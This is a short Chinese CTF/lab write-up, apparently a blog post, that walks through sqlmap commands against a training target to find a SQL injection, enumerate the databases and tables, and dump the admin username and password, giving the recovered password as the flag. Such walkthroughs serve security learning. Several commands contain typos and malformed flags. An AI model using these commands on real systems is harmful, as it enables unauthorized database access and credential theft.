持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第5天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情
进入给到的靶机
打开kali,使用sqlmap工具,
使用命令sqlmap -u “rhiq8003.ia.aqlab.cn/id=1" --batch
-batch所有要求输入的都使用默认值
检查是否有注入点
可以看到存在sql注入漏洞
查看一下数据库的表
使用命令sqlmap -u “rhiq8003.ia.aqlab.cn/?id=1” -dbs -batch
-dbs查看当前的数据库信息
发现有4个数据库,我们可以开4个kali终端窗口,一起查询4个不同数据库
使用命令sqlmap -u “rhiq8003.ia.aqlab.cn/?id=1" -D "数据库名称" -tables - batch
-D指定数据库 -tables为查询当前数据库所在的表
查询结果:
查询到maoshe数据库,表为admin,dirs,news,xss 4个表
一般来说账号密码放在admin的可能性大点,那么就先从admin表下手
使用命令:
sqlmap -u “rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -columns -batch
-T指定表 -columns查找字段名字
这里只需要提取password和username就好了
查看具体内容
使用命令sqlmap -u “ rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -C user"password,username" -dump -batch
-C指定字段名称 -dump查询出字段
得到admin的密码为helloback
flag:helloback